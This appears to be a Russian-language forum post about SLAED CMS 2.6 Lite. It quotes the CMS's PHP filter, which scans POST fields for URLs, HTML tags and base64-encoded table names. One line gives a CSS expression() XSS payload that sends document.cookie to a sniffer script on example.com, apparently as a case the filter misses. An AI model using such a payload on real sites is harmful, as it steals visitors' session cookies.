Тогда как это штука работает в пользовательских частях в про версии? Там более хитрая система фильтрации?
Версия системы: SLAED CMS 2.6 Lite
Версия PHP: PHP 5
foreach ($_POST as $var_name=>$var_value) { $var_value = is_array($var_value) ? fields_save($var_value) : $var_value; if ($confs['url_post']) if (preg_match("#^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)#i", $var_value)) warn_report("URL in POST - ".$var_name." = ". $var_value); $editor = intval(substr($admin[3], 0, 1)); if (((defined("ADMIN_FILE") && $editor != 1) || (!defined("ADMIN_FILE") && $conf['redaktor'] != 1)) && preg_match("#<.*?(script|body|object|iframe|applet|meta|form).*?>#i", urldecode($var_value))) warn_report("HTML in POST - ".$var_name." = ". $var_value); $security_string = "#".$prefix."_admins|".$prefix."_users#i"; $security_decode = base64_decode($var_value); if (preg_match($security_string, $security_decode)) hack_report("XSS base64 in POST - ".$var_name." = ". $var_value); if (preg_match($security_string, $var_value)) hack_report("XSS in POST - ".$var_name." = ". $var_value); $security_slash = preg_replace("#\/\*.*?\*\/#", "", $var_value); if (preg_match($security_string, $security_slash)) hack_report("XSS in POST - ".$var_name." = ". $var_value); } }
if (preg_match("/^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)/i", $var_value)) warn_report("URL in POST - ".$var_name." = ". $var_value);
style="background-image: url('http://example.com/sniffer.php?cookie=' + expression(document.cookie));"
$comment = str_replace(array("'", "\\"), array("'", "\"), stripslashes($comment));
Форум
Контакты